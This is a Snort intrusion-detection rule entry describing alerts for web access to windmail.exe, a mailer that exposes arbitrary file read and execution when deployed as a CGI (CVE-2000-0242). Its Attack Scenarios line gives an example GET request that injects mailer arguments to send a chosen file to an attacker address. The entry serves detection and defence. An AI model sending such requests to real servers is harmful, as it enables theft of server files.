GEN:SID 1:1158
Message WEB-MISC windmail.exe access
Summary This event is generated when an attempt is made to access the executable
file WindMail.exe using a web connection.
Impact Remote attackers could subvert the WindMail mailer to read or execute
arbitrary files on the web server
Detailed Information WindMail is a commandline mail program for Windows.  It is sometimes
deployed for scripting or for sending email through a web application.
Some windmail deployments make webmail.exe a CGI application, which it was
not designed to do.  The result is that an attacker could read or
execute arbitrary files on the system that the web server has access to.
It should never be a CGI application itself, and instead should be called
by another program that properly filters input.
Affected Systems All systems using windmail.exe
Attack Scenarios http://target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address
Ease of Attack Simple crafting of a web GET request
Corrective Action Look at the packet to determine whether a request was made via an HTTP GET
for the windmail.exe application. If so, determine whether the attacked
web server had windmail.exe on it.
Additional References  
Rule References arachnids: 465
bugtraq: 1073
cve: 2000-0242
nessus: 10365